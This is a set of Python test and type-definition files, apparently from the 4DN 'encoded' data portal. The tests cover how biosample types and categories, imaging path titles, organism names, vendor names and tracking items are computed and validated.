res = testapp.patch_json(biosample_1['@id'], {'cell_culture_details': [biosample_cc_w_diff['@id']]}).json['@graph'][0]
assert human_biosource['biosource_name'] in res['biosource_summary']
assert ' differentiated to ' in res['biosource_summary']
assert de_term['display_title'] in res['biosource_summary']
def test_biosample_sample_type_w_differentiation(testapp, biosample_1, biosample_cc_w_diff):
res = testapp.patch_json(biosample_1['@id'], {'cell_culture_details': [biosample_cc_w_diff['@id']]}).json['@graph'][0]
assert res['biosample_type'] == 'in vitro differentiated cells'
def test_biosample_sample_type_immortalized_wo_differentiation(testapp, biosample_1, biosample_cc_wo_diff):
res = testapp.patch_json(biosample_1['@id'], {'cell_culture_details': [biosample_cc_wo_diff['@id']]}).json['@graph'][0]
assert res['biosample_type'] == 'immortalized cells'
def test_biosample_sample_type_bs_stem_cell_line(testapp, biosample_1, human_biosource):
bsres = testapp.patch_json(human_biosource['@id'], {'biosource_type': 'stem cell derived cell line'}).json['@graph'][0]
res = testapp.patch_json(biosample_1['@id'], {'biosource': [bsres['@id']]}).json['@graph'][0]
assert res['biosample_type'] == 'stem cells'
def test_biosample_sample_type_bs_multicellular(testapp, biosample_1, human_biosource):
bsres = testapp.patch_json(human_biosource['@id'], {'biosource_type': 'multicellular organism'}).json['@graph'][0]
res = testapp.patch_json(biosample_1['@id'], {'biosource': [bsres['@id']]}).json['@graph'][0]
assert res['biosample_type'] == 'whole organisms'
def test_biosample_sample_type_bs_tissue(testapp, biosample_1, human_biosource):
bty = 'tissue'
bsres = testapp.patch_json(human_biosource['@id'], {'biosource_type': bty}).json['@graph'][0]
res = testapp.patch_json(biosample_1['@id'], {'biosource': [bsres['@id']]}).json['@graph'][0]
assert res['biosample_type'] == bty
def test_biosample_sample_type_bs_lines_and_to_pluralize(testapp, biosample_1, human_biosource):
types = {
"primary cell": "primary cells",
"primary cell line": "primary cells",
"immortalized cell line": "immortalized cells",
"stem cell": "stem cells",
"induced pluripotent stem cell": "induced pluripotent stem cells"
}
for bty, bsty in types.items():
bsres = testapp.patch_json(human_biosource['@id'], {'biosource_type': bty}).json['@graph'][0]
res = testapp.patch_json(biosample_1['@id'], {'biosource': [bsres['@id']]}).json['@graph'][0]
assert res['biosample_type'] == bsty
def test_biosample_sample_type_bs_multiple_same_type(testapp, biosample_1, human_biosource, GM12878_biosource):
res = testapp.patch_json(biosample_1['@id'], {'biosource': [human_biosource['@id'], GM12878_biosource['@id']]}).json['@graph'][0]
assert res['biosample_type'] == 'immortalized cells'
def test_biosample_sample_type_bs_multiple_diff_types(testapp, biosample_1, human_biosource, lung_biosource):
res = testapp.patch_json(biosample_1['@id'], {'biosource': [human_biosource['@id'], lung_biosource['@id']]}).json['@graph'][0]
assert res['biosample_type'] == 'mixed sample'
def test_biosample_modifications_summaries(biosample_w_mod):
assert biosample_w_mod['modifications_summary'] == 'Crispr for RAD21 gene'
assert biosample_w_mod['modifications_summary_short'] == 'RAD21 Crispr'
def test_biosample_modifications_summaries_no_mods(biosample_1):
assert biosample_1.get('modifications_summary') == 'None'
assert biosample_1.get('modifications_summary_short') == 'None'
def test_biosample_treatments_summary(biosample_w_treatment):
assert biosample_w_treatment.get('treatments_summary') == 'shRNA treatment'
def test_biosample_treatments_summary_no_treatment(biosample_1):
assert biosample_1.get('treatments_summary') == 'None'
def test_biosample_category_undifferentiated_stem_cells(testapp, biosample_1, human_biosource):
scl = testapp.patch_json(human_biosource['@id'], {'biosource_type': 'stem cell derived cell line'}).json['@graph'][0]
bios = testapp.patch_json(biosample_1['@id'], {'biosource': [scl['@id']]}).json['@graph'][0]
assert 'Human stem cell' in bios.get('biosample_category')
def test_biosample_category_differentiated_stem_cells(testapp, biosample_1, human_biosource, biosample_cc_w_diff):
scl = testapp.patch_json(human_biosource['@id'], {'biosource_type': 'stem cell derived cell line'}).json['@graph'][0]
bios = testapp.patch_json(biosample_1['@id'], {'biosource': [scl['@id']], 'cell_culture_details': [biosample_cc_w_diff['@id']]}).json['@graph'][0]
cats = bios.get('biosample_category')
assert 'Human stem cell' not in cats
assert 'In vitro Differentiation' in cats
def test_biosample_biosource_category_two_biosource(testapp, biosample_1, human_biosource, lung_biosource):
res = testapp.patch_json(biosample_1['@id'], {'biosource': [human_biosource['@id'], lung_biosource['@id']]}).json['@graph'][0]
cat = res.get('biosample_category')
assert len(cat) == 1
assert cat[0] == 'Mixed samples'
# setting up fixtures for testing tissue and organ calcprop
@pytest.fixture
def brain_term(testapp, uberon_ont, cns_term, ectoderm_term):
item = {
"is_slim_for": "organ",
"term_id": "brain_tid",
"term_name": "brain",
"source_ontologies": [uberon_ont['@id']],
"slim_terms": [cns_term['@id'], ectoderm_term['@id']]
}
return testapp.post_json('/ontology_term', item).json['@graph'][0]
@pytest.fixture
def cns_term(testapp, uberon_ont, ectoderm_term):
item = {
"is_slim_for": "system",
"term_id": "cns_tid",
"term_name": "central nervous system",
"source_ontologies": [uberon_ont['@id']],
"slim_terms": [ectoderm_term['@id']]
}
return testapp.post_json('/ontology_term', item).json['@graph'][0]
@pytest.fixture
def ectoderm_term(testapp, uberon_ont):
item = {
"is_slim_for": "developmental",
"term_id": "ectoderm_tid",
"term_name": "ectoderm",
"source_ontologies": [uberon_ont['@id']],
}
return testapp.post_json('/ontology_term', item).json['@graph'][0]
@pytest.fixture
def primary_cell_term(testapp, ontology):
item = {
"is_slim_for": "cell",
"term_id": "pcell_id",
"term_name": "primary cell",
"source_ontologies": [ontology['@id']],
}
return testapp.post_json('/ontology_term', item).json['@graph'][0]
@pytest.fixture
def cortical_neuron_term(testapp, uberon_ont, brain_term, cns_term,
ectoderm_term, primary_cell_term):
item = {
"term_id": "cort_neuron_id",
"term_name": "cortical neuron",
"source_ontologies": [uberon_ont['@id']],
"slim_terms": [brain_term['@id'], cns_term['@id'], ectoderm_term['@id'], primary_cell_term['@id']]
}
return testapp.post_json('/ontology_term', item).json['@graph'][0]
@pytest.fixture
def bcc_diff_to_cortical(testapp, lab, award, cortical_neuron_term):
item = {
"culture_start_date": "2018-01-01",
"differentiation_state": "Stem cell differentiated to cortical neuron",
"tissue": cortical_neuron_term['@id'],
"in_vitro_differentiated": "Yes",
'award': award['@id'],
'lab': lab['@id']
}
return testapp.post_json('/biosample_cell_culture', item).json['@graph'][0]
@pytest.fixture
def diff_cortical_neuron_bs(testapp, F123_biosource, bcc_diff_to_cortical, lab, award):
item = {
"description": "Differentiated cortical neuron",
"biosource": [F123_biosource['@id']],
"cell_culture_details": [bcc_diff_to_cortical['@id']],
"award": award['@id'],
"lab": lab['@id']
}
return testapp.post_json('/biosample', item).json['@graph'][0]
@pytest.fixture
def brain_biosource(testapp, brain_term, lab, award):
item = {
"description": "Brain tissue",
"biosource_type": "tissue",
"tissue": brain_term['@id'],
"lab": lab['@id'],
"award": award['@id']
}
return testapp.post_json('/biosource', item).json['@graph'][0]
@pytest.fixture
def brain_biosample(testapp, brain_biosource, lab, award):
item = {
"description": "Brain Tissue Biosample",
"biosource": [brain_biosource['@id']],
"award": award['@id'],
"lab": lab['@id']
}
return testapp.post_json('/biosample', item).json['@graph'][0]
@pytest.fixture
def mixed_biosample(testapp, brain_biosource, lung_biosource, lab, award):
item = {
"description": "Mixed Tissue Biosample",
"biosource": [brain_biosource['@id'], lung_biosource['@id']],
"award": award['@id'],
"lab": lab['@id']
}
return testapp.post_json('/biosample', item).json['@graph'][0]
def test_get_tissue_organ_info_none_present(biosample_1):
assert 'tissue_organ_info' not in biosample_1
def test_get_tissue_organ_info_tissue_in_cell_culture(diff_cortical_neuron_bs, cortical_neuron_term):
org_sys = sorted(['brain', 'central nervous system', 'ectoderm'])
assert 'tissue_organ_info' in diff_cortical_neuron_bs
assert diff_cortical_neuron_bs['tissue_organ_info']['tissue_source'] == cortical_neuron_term.get('display_title')
assert sorted(diff_cortical_neuron_bs['tissue_organ_info']['organ_system']) == org_sys
def test_get_tissue_organ_info_tissue_in_biosource(brain_biosample, brain_term):
org_sys = sorted(['central nervous system', 'ectoderm'])
assert 'tissue_organ_info' in brain_biosample
assert brain_biosample['tissue_organ_info']['tissue_source'] == brain_term.get('display_title')
assert sorted(brain_biosample['tissue_organ_info']['organ_system']) == org_sys
def test_get_tissue_organ_info_tissue_mixed_biosample(mixed_biosample):
org_sys = sorted(['central nervous system', 'ectoderm'])
assert 'tissue_organ_info' in mixed_biosample
assert mixed_biosample['tissue_organ_info']['tissue_source'] == 'mixed tissue'
assert sorted(mixed_biosample['tissue_organ_info']['organ_system']) == org_sys
def test_get_tissue_organ_info_none_if_only_cell_slim_terms(testapp, F123_biosource, lab, award):
item = {
"description": "F123 Biosample",
"biosource": [F123_biosource['@id']],
"award": award['@id'],
"lab": lab['@id']
}
f123_biosample = testapp.post_json('/biosample', item).json['@graph'][0]
assert 'tissue_organ_info' not in f123_biosample
```
#### File: encoded/tests/test_types_imaging.py
```python
import pytest
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def img_path_blank(testapp, lab, award):
item = {'award': award['@id'], 'lab': lab['@id']}
return testapp.post_json('/imaging_path', item).json['@graph'][0]
@pytest.fixture
def p_antibody(testapp, lab, award):
item = {'award': award['@id'],
'lab': lab['@id'],
'antibody_name': 'RAD21 antibody',
'antibody_product_no': 'ab12043'}
return testapp.post_json('/antibody', item).json['@graph'][0]
@pytest.fixture
def s_antibody(testapp, lab, award):
item = {'award': award['@id'],
'lab': lab['@id'],
'antibody_name': 'anti-mouse antibody',
'antibody_product_no': '9876'}
return testapp.post_json('/antibody', item).json['@graph'][0]
def test_imgpath_displaytitle_target_probe(testapp, img_path_blank, prot_bio_feature):
res = testapp.patch_json(img_path_blank['@id'], {'target': [prot_bio_feature['@id']]}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein'
res = testapp.patch_json(img_path_blank['@id'], {'labeled_probe': 'imaging probe'}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein targeted by imaging probe'
def test_imgpath_displaytitle(testapp, img_path_blank, prot_bio_feature):
assert img_path_blank['display_title'] == 'not enough information'
res = testapp.patch_json(img_path_blank['@id'], {'target': [prot_bio_feature['@id']],
'labels': ['GFP', 'RFP']}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein targeted by GFP,RFP'
res = testapp.patch_json(img_path_blank['@id'], {'labeled_probe': 'imaging probe'}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein targeted by GFP,RFP-labeled imaging probe'
res = testapp.patch_json(img_path_blank['@id'], {'other_probes': ['intermediate probe 1', 'other probe 2']}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein targeted by intermediate probe 1, other probe 2 (with GFP,RFP-labeled imaging probe)'
res = testapp.patch_json(img_path_blank['@id'], {'override_display_title': 'Custom title'}).json['@graph'][0]
assert res['display_title'] == 'Custom title'
def test_imgpath_displaytitle_antibodies(testapp, img_path_blank, prot_bio_feature, p_antibody, s_antibody):
res = testapp.patch_json(img_path_blank['@id'], {'target': [prot_bio_feature['@id']],
'primary_antibodies': [p_antibody['@id']],
'secondary_antibody': s_antibody['@id'],
'labels': ['AF 647']}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein targeted by RAD21 antibody (with AF 647-labeled anti-mouse antibody)'
res = testapp.patch_json(img_path_blank['@id'], {'other_probes': ['other probe'],
'labeled_probe': 'imaging probe'}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein targeted by other probe, RAD21 antibody (with AF 647-labeled imaging probe, anti-mouse antibody)'
def test_imgpath_displaytitle_duplicate_label_on_secondary_ab(testapp, img_path_blank, prot_bio_feature, s_antibody):
labeled_sec_ab = testapp.patch_json(s_antibody['@id'], {'antibody_name': 'anti-mouse AF 647'}).json['@graph'][0]
res = testapp.patch_json(img_path_blank['@id'], {'target': [prot_bio_feature['@id']],
'secondary_antibody': labeled_sec_ab['@id'],
'labels': ['AF 647']}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein targeted by anti-mouse AF 647'
def test_imgpath_displaytitle_labels_only(testapp, img_path_blank):
res = testapp.patch_json(img_path_blank['@id'], {'labels': ['GFP', 'RFP']}).json['@graph'][0]
assert res['display_title'] == 'GFP,RFP'
def test_imgpath_displaytitle_labeled_probe_only(testapp, img_path_blank):
res = testapp.patch_json(img_path_blank['@id'], {'labels': ['GFP'],
'labeled_probe': 'imaging probe'}).json['@graph'][0]
assert res['display_title'] == 'GFP-labeled imaging probe'
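# In summary, the imaging_path display_title tests above expect a composed
# string of the form '<targets> targeted by <probes/antibodies> (with
# <label>-labeled <labeled probe/secondary antibody>)'; they also show that the
# title degrades gracefully to just the labels or the labeled probe when that
# is all there is, drops a label already contained in the secondary antibody
# name, and always honors override_display_title when present.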
```
#### File: encoded/tests/test_types_individual.py
```python
import pytest
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def mouse_child(testapp, mouse, lab, award):
return {
'uuid': '4731449b-f283-4fdf-ad8a-b69cf5a7e68a',
'award': award['@id'],
'lab': lab['@id'],
'organism': mouse['@id'],
"sex": "female",
}
@pytest.fixture
def mouse_individual_2(testapp, mouse, lab, award):
item = {
'uuid': 'd89c5c5b-a427-4efa-b6da-44239d92f2e7',
"age": 99,
"age_units": "day",
'award': award['@id'],
'lab': lab['@id'],
'organism': mouse['@id'],
"mouse_strain": "Balb-c",
"mouse_life_stage": "adult",
"sex": "male",
}
return testapp.post_json('/individual_mouse', item).json['@graph'][0]
def test_validate_individual_relation_valid_post(testapp, award, lab, mouse_individual, mouse_child):
mouse_child['individual_relation'] = [
{'relationship_type': 'derived from', 'individual': mouse_individual['@id']}]
res = testapp.post_json('/individual_mouse', mouse_child, status=201)
assert not res.json.get('errors')
def test_validate_individual_relation_species(testapp, award, lab, mouse_child, human_individual):
mouse_child['individual_relation'] = [{'relationship_type': 'derived from', 'individual': human_individual['@id']}]
res = testapp.post_json('/individual_mouse', mouse_child, status=422)
errors = res.json['errors']
assert errors[0]['name'] == 'Individual relation: different species'
def test_validate_individual_relation_valid_patch(testapp, award, lab, mouse_child,
mouse_individual, mouse_individual_2):
res = testapp.post_json('/individual_mouse', mouse_child, status=201)
assert not res.json.get('errors')
patch_body = {
'individual_relation': [
{'relationship_type': 'derived from', 'individual': mouse_individual['@id']},
{'relationship_type': 'derived from', 'individual': mouse_individual_2['@id']}
]
}
res2 = testapp.patch_json(res.json['@graph'][0]['@id'], patch_body, status=200)
assert not res2.json.get('errors')
def test_validate_individual_relation_valid_patch_contains_uuid(testapp, award, lab, mouse_child,
mouse_individual, mouse_individual_2):
child_mouse = testapp.post_json('/individual_mouse', mouse_child, status=201).json['@graph'][0]
patch_body = {
'uuid': child_mouse.get('uuid'),
'individual_relation': [
{'relationship_type': 'derived from', 'individual': mouse_individual['@id']},
{'relationship_type': 'derived from', 'individual': mouse_individual_2['@id']}
]
}
res2 = testapp.patch_json(child_mouse['@id'], patch_body, status=200)
assert not res2.json.get('errors')
def test_validate_individual_relation_self(testapp, award, lab, mouse_child):
res = testapp.post_json('/individual_mouse', mouse_child, status=201)
assert not res.json.get('errors')
patch_body = [{'relationship_type': 'derived from', 'individual': res.json['@graph'][0]['@id']}]
res2 = testapp.patch_json(res.json['@graph'][0]['@id'], {'individual_relation': patch_body}, status=422)
errors = res2.json['errors']
assert errors[0]['name'] == 'Individual relation: self-relation'
def test_validate_individual_relation_same(testapp, award, lab, mouse_individual, mouse_individual_2, mouse_child):
mouse_child['individual_relation'] = [
{'relationship_type': 'derived from (maternal strain)', 'individual': mouse_individual['@id']},
{'relationship_type': 'derived from (maternal strain)', 'individual': mouse_individual_2['@id']}]
res = testapp.post_json('/individual_mouse', mouse_child, status=422)
errors = res.json['errors']
assert errors[0]['name'] == 'Individual relation: too many of the same type'
def test_validate_individual_relation_duplicate(testapp, award, lab, mouse_individual, mouse_child):
mouse_child['individual_relation'] = [
{'relationship_type': 'derived from', 'individual': mouse_individual['@id']},
{'relationship_type': 'derived from (maternal strain)', 'individual': mouse_individual['@id']}]
res = testapp.post_json('/individual_mouse', mouse_child, status=422)
errors = res.json['errors']
assert errors[0]['name'] == 'Individual relation: multiple relations with same parent'
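# The validators exercised above reject cross-species relations, self-relations,
# two relations of the same relationship_type, and multiple relations pointing
# at the same parent individual, while well-formed POST/PATCH bodies (including
# a PATCH that echoes the item's own uuid) come back without an 'errors' key.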
```
#### File: encoded/tests/test_types_init_collections.py
```python
import pytest
from ..types.image import Image
from ..util import utc_today_str
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def genomic_region_w_onlyendloc(testapp, lab, award):
item = {
"genome_assembly": "dm6",
"end_coordinate": 3,
'award': award['@id'],
'lab': lab['@id']
}
return testapp.post_json('/genomic_region', item).json['@graph'][0]
@pytest.fixture
def dt4genomic_regions(genomic_region_w_onlyendloc, some_genomic_region, basic_genomic_region,
vague_genomic_region, vague_genomic_region_w_desc):
return {
'dm6': genomic_region_w_onlyendloc,
'GRCh38:1:17-544': some_genomic_region,
'GRCh38': basic_genomic_region,
'GRCm38:5': vague_genomic_region,
'gene X enhancer': vague_genomic_region_w_desc
}
@pytest.fixture
def targets(target_w_desc, target_w_region, target_w_genes):
return {'target_w_desc': target_w_desc,
'target_w_region': target_w_region,
'target_w_genes': target_w_genes
}
@pytest.mark.skip # targets are not used
def test_calculated_target_summaries(testapp, targets):
for name in targets:
summary = targets[name]['target_summary']
if name == 'target_w_genes':
assert summary == 'Gene:eeny,meeny'
if name == 'target_w_region':
assert summary == 'GRCh38:X:1-3'
if name == 'target_w_desc':
assert summary == 'no target'
def test_document_display_title_w_attachment(testapp, protocol_data, attachment):
protocol_data['attachment'] = attachment
del(protocol_data['protocol_type'])
res = testapp.post_json('/document', protocol_data).json['@graph'][0]
assert res.get('display_title') == 'red-dot.png'
def test_document_display_title_wo_attachment(testapp, protocol_data):
del(protocol_data['protocol_type'])
res = testapp.post_json('/document', protocol_data).json['@graph'][0]
assert res.get('display_title') == 'Document from ' + utc_today_str()
def test_organism_display_title_standard_scientific_name(testapp, human_data):
res = testapp.post_json('/organism', human_data).json['@graph'][0]
assert res.get('display_title') == 'H. sapiens'
def test_organism_display_title_three_part_scientific_name(testapp, human_data):
human_data['scientific_name'] = 'Drosophila pseudoobscura pseudoobscura'
res = testapp.post_json('/organism', human_data).json['@graph'][0]
assert res.get('display_title') == 'D. pseudoobscura pseudoobscura'
def test_organism_display_title_one_part_scientific_name(testapp, human_data):
human_data['scientific_name'] = 'george'
res = testapp.post_json('/organism', human_data).json['@graph'][0]
assert res.get('display_title') == 'george'
def test_organism_display_title_no_scientific_name(testapp, human_data):
del(human_data['scientific_name'])
res = testapp.post_json('/organism', human_data).json['@graph'][0]
assert res.get('display_title') == 'human'
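# A minimal sketch of the abbreviation rule the four organism tests above
# encode (illustrative only; the real logic lives in the organism type):
def _abbreviate_scientific_name(scientific_name):
    parts = scientific_name.split()
    if len(parts) < 2:
        return scientific_name
    return parts[0][0] + '. ' + ' '.join(parts[1:])
# e.g. 'Homo sapiens' -> 'H. sapiens',
#      'Drosophila pseudoobscura pseudoobscura' -> 'D. pseudoobscura pseudoobscura',
#      'george' -> 'george'; with no scientific_name at all, the tests expect
#      the organism name ('human') instead.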
@pytest.fixture
def google_analytics_tracking_data():
return {
"status": "released",
"tracking_type": "google_analytics",
"google_analytics": {
"reports": {
"views_by_experiment_set": [
{
"ga:productCategoryLevel2": "ExperimentSetReplicate",
"ga:productName": "4DNESKSPBI9A",
"ga:productListClicks": 1,
"ga:productListViews": 21,
"ga:productSku": "4DNESKSPBI9A",
"ga:productDetailViews": 4,
"ga:productBrand": "Chuck Murry, UW"
}
],
"fields_faceted": [
{
"ga:users": 12,
"ga:totalEvents": 19,
"ga:sessions": 13,
"ga:dimension3": "experiments_in_set.experiment_type.display_title"
},
{
"ga:users": 13,
"ga:totalEvents": 16,
"ga:sessions": 15,
"ga:dimension3": "experiments_in_set.biosample.biosource.individual.organism.name"
}
],
"views_by_file": [
{
"ga:productCategoryLevel2": "FileProcessed",
"ga:productName": "4DNFIC2XS1Y3.mcool",
"ga:productListClicks": 0,
"ga:productListViews": 0,
"ga:productSku": "4DNFIC2XS1Y3",
"ga:productDetailViews": 1,
"ga:productBrand": "Erez Lieberman Aiden, BCM"
}
]
},
"for_date": "2019-05-09",
"date_increment": "daily"}
}
@pytest.fixture
def google_analytics(testapp, google_analytics_tracking_data):
return testapp.post_json('/tracking_item', google_analytics_tracking_data).json['@graph'][0]
@pytest.fixture
def download_tracking_item_data():
return {
"status": "released",
"tracking_type": "download_tracking",
"download_tracking": {
"geo_country": "NL",
"geo_city": "Utrecht, Provincie Utrecht",
"request_path": "/files-processed/4DNFI6BTR1IC/@@download/4DNFI6BTR1IC.pairs.gz.px2",
"user_uuid": "anonymous",
"user_agent": "Wget/1.17.1 (linux-gnu)",
"remote_ip": "172.16.17.32",
"file_format": "pairs_px2",
"filename": "4DNFI6BTR1IC.pairs.gz.px2",
"experiment_type": "in situ Hi-C"
}
}
@pytest.fixture
def download_tracking(testapp, download_tracking_item_data):
return testapp.post_json('/tracking_item', download_tracking_item_data).json['@graph'][0]
@pytest.fixture
def jupyterhub_session_tracking_data():
return {
"status": "in review by lab",
"tracking_type": "jupyterhub_session",
"jupyterhub_session": {
"date_initialized": "2019-05-09T05:11:56.389876+00:00",
"date_culled": "2019-05-09T06:21:54.726782+00:00",
"user_uuid": "e0beacd7-225f-4fa8-81fb-a1856603e204"
},
"uuid": "ff4575d4-67b4-458f-8b1c-b3fcb3690ce9",
}
@pytest.fixture
def jupyterhub_session(testapp, jupyterhub_session_tracking_data):
return testapp.post_json('/tracking_item', jupyterhub_session_tracking_data).json['@graph'][0]
def test_tracking_item_display_title_google_analytic(google_analytics):
assert google_analytics.get('display_title') == 'Google Analytics for 2019-05-09'
def test_tracking_item_display_title_download(download_tracking):
assert download_tracking.get('display_title') == 'Download Tracking Item from ' + utc_today_str()
def test_tracking_item_display_title_other(jupyterhub_session):
assert jupyterhub_session.get('display_title') == 'Tracking Item from ' + utc_today_str()
@pytest.fixture
def vendor_data(lab, award):
return {"title": "WorTHington Biochemical", 'lab': lab['@id'], 'award': award['@id']}
def test_vendor_update_name_no_caps(testapp, vendor_data):
res = testapp.post_json('/vendor', vendor_data, status=201)
assert res.json['@graph'][0]['name'] == "worthington-biochemical"
def test_vendor_update_name_no_punctuation_or_space(testapp, vendor_data):
vendor_data['title'] = "Eeny, = Meeny! # -miny?"
res = testapp.post_json('/vendor', vendor_data, status=201)
assert res.json['@graph'][0]['name'] == "eeny-meeny-miny"
def test_vendor_name_updates_on_patch(testapp, vendor_data):
res = testapp.post_json('/vendor', vendor_data, status=201)
assert res.json['@graph'][0]['name'] == "worthington-biochemical"
res = testapp.patch_json(res.json['@graph'][0]['@id'], {'title': 'WaHoo'}, status=200)
assert res.json['@graph'][0]['name'] == "wahoo"
@pytest.fixture
def vendor_data_alias(lab, award):
return {
'title': 'Wrong Alias Biochemical',
'lab': lab['@id'],
'award': award['@id'],
'aliases': ['my_lab:this_is_correct_one',
'my_lab:this/is_wrong',
r'my_lab:this\is_wrong_too']}
def test_vendor_alias_wrong_format(testapp, vendor_data_alias):
res = testapp.post_json('/vendor', vendor_data_alias, status=422)
response = res.json
print(res.json)
assert response['status'] == 'error'
assert response['code'] == 422
problematic_aliases = 0
for an_error in response['errors']:
if an_error['name'].startswith('Schema: aliases'):
problematic_aliases += 1
assert problematic_aliases == 2
def test_genomic_region_display_title(testapp, dt4genomic_regions):
for dt, region in dt4genomic_regions.items():
assert region.get('display_title') == dt
def test_image_unique_key(registry, image_data):
uuid = "0afb6080-1c08-11e4-8c21-0800200c9a44"
image = Image.create(registry, uuid, image_data)
keys = image.unique_keys(image.properties)
assert 'red-dot.png' in keys['image:filename']
```
#### File: encoded/tests/test_types_microscope_configuration.py
```python
import pytest
from ..schema_formats import is_uuid
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def tier1_microscope_configuration(testapp):
item = {
'uuid': 'e700e61c-9da5-465f-9b4f-189852897df5',
'microscope': {
'Tier': 1,
'ValidationTier': 1,
'Name': 'Test Mic. Conf.'
}
}
return testapp.post_json('/microscope-configurations', item).json['@graph'][0]
def test_get_tier1_microscope(testapp, tier1_microscope_configuration):
assert tier1_microscope_configuration['microscope']['Tier'] == 1
assert tier1_microscope_configuration['microscope']['ValidationTier'] == 1
assert is_uuid(tier1_microscope_configuration['microscope']['ID'])
def test_tier1_microscope_display_title(testapp, tier1_microscope_configuration):
assert tier1_microscope_configuration['display_title'] == 'Test Mic. Conf.'
tier1_microscope_configuration['microscope']['Name'] = 'Test Mic. Conf. Updated'
res = testapp.patch_json(tier1_microscope_configuration['@id'], {
'microscope': tier1_microscope_configuration['microscope']}, status=200)
assert res.json['@graph'][0].get(
'display_title') == 'Test Mic. Conf. Updated'
```
#### File: encoded/tests/test_types_tracking_item.py
```python
import pytest
# Code that uses this is commented-out below.
# from ..types import TrackingItem
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def tracking_item():
return {"tracking_type": "other", "other_tracking": {"extra_field": "extra_value"}}
def test_insert_and_get_tracking_item(testapp, tracking_item):
res = testapp.post_json('/tracking-items', tracking_item, status=201)
assert res.json['@graph'][0]['tracking_type'] == tracking_item['tracking_type']
res_uuid = res.json['@graph'][0]['uuid']
get_res = testapp.get('/tracking-items/' + res_uuid).follow()
assert get_res.json['other_tracking']['extra_field'] == tracking_item['other_tracking']['extra_field']
assert get_res.json.get('date_created')
# def test_tracking_item_create_and_commit(testapp, dummy_request):
# test_body = {
# "tracking_type": "other",
# "other_tracking": {"key1": "val1"},
# "submitted_by": "<EMAIL>"
# }
# res = TrackingItem.create_and_commit(dummy_request, test_body)
# assert res['status'] == 'success'
# res_path = res['@graph'][0]
# app_res = testapp.get(res_path)
# assert app_res.json['tracking_type'] == test_body['tracking_type']
# assert app_res.json['other_tracking']['key1'] == test_body['other_tracking']['key1']
# # should not have date created in this case (no validators run)
# assert 'date_created' not in app_res.json
# # however status is added automatically when using create_and_commit fxn
# assert app_res.json['status'] == 'in review by lab'
```
#### File: encoded/tests/test_upgrade_ontology_term.py
```python
import pytest
pytestmark = [pytest.mark.setone, pytest.mark.working]
@pytest.fixture
def ontology_term_1(so_ont, award, lab):
return{
"schema_version": '1',
"term_id": 'SO:0001111',
"term_name": 'so_term',
"source_ontology": so_ont['@id']
}
def test_ontology_term_1_2(
app, ontology_term_1, so_ont):
migrator = app.registry['upgrader']
value = migrator.upgrade('ontology_term', ontology_term_1, current_version='1', target_version='2')
assert value['schema_version'] == '2'
assert value['source_ontologies'][0] == so_ont['@id']
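# i.e. the 1 -> 2 ontology_term upgrader bumps schema_version and moves the
# single 'source_ontology' link into the 'source_ontologies' list.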
```
#### File: encoded/types/biosample.py
```python
from snovault import (
calculated_property,
collection,
load_schema,
)
from .base import (
Item,
lab_award_attribution_embed_list,
get_item_or_none
)
from .dependencies import DependencyEmbedder
def _build_biosample_embedded_list():
""" Helper function intended to be used to create the embedded list for biosample.
All types should implement a function like this going forward.
"""
modification_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='modifications',
t='modification')
mod_bio_feature_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='modifications.target_of_mod',
t='bio_feature')
treatments_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='treatments',
t='treatment')
biosource_cell_line_embeds = DependencyEmbedder.embed_for_type(base_path='biosource.cell_line',
t='ontology_term',
additional_embeds=['synonyms'])
biosource_tissue_embeds = DependencyEmbedder.embed_for_type(base_path='biosource.tissue',
t='ontology_term',
additional_embeds=['synonyms'])
biosource_tissue_slim_embeds = DependencyEmbedder.embed_for_type(base_path='biosource.tissue.slim_terms',
t='ontology_term',
additional_embeds=['synonyms'])
cell_culture_details_embeds = DependencyEmbedder.embed_for_type(base_path='cell_culture_details.tissue',
t='ontology_term',
additional_embeds=['synonyms'])
cell_culture_details_tissue_embeds = DependencyEmbedder.embed_for_type(
base_path='cell_culture_details.tissue.slim_terms',
t='ontology_term',
additional_embeds=['synonyms'])
biosample_protocols_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='biosample_protocols',
t='protocol')
return (
Item.embedded_list + lab_award_attribution_embed_list + modification_embeds + mod_bio_feature_embeds
+ treatments_embeds + biosource_cell_line_embeds + biosource_tissue_embeds + biosource_tissue_slim_embeds
+ cell_culture_details_embeds + cell_culture_details_tissue_embeds + biosample_protocols_embeds + [
# Badge linkTo
'badges.badge.title',
'badges.badge.commendation',
'badges.badge.warning',
'badges.badge.badge_classification',
'badges.badge.description',
'badges.badge.badge_icon',
'badges.messages',
# Biosource linkTo - many calc prop dependencies
'biosource.*',
'biosource.individual.sex',
'biosource.individual.organism.name',
'biosource.biosource_vendor.name', # display_title uses this
# BiosampleCellCulture linkTo + Image linkTo
'cell_culture_details.*',
'cell_culture_details.morphology_image.caption',
'cell_culture_details.morphology_image.attachment.href',
'cell_culture_details.morphology_image.attachment.type',
'cell_culture_details.morphology_image.attachment.md5sum',
'cell_culture_details.morphology_image.attachment.download',
'cell_culture_details.morphology_image.attachment.width',
'cell_culture_details.morphology_image.attachment.height',
# Construct linkTo
'treatments.constructs.name',
]
)
@collection(
name='biosamples',
unique_key='accession',
properties={
'title': 'Biosamples',
'description': 'Biosamples used in the 4DN project',
})
class Biosample(Item): # CalculatedBiosampleSlims, CalculatedBiosampleSynonyms):
"""Biosample class."""
item_type = 'biosample'
schema = load_schema('encoded:schemas/biosample.json')
# name_key = 'accession'
aggregated_items = {
"badges": [
"messages",
"badge.commendation",
"badge.warning",
"badge.uuid",
"badge.@id",
"badge.badge_icon",
"badge.description"
]
}
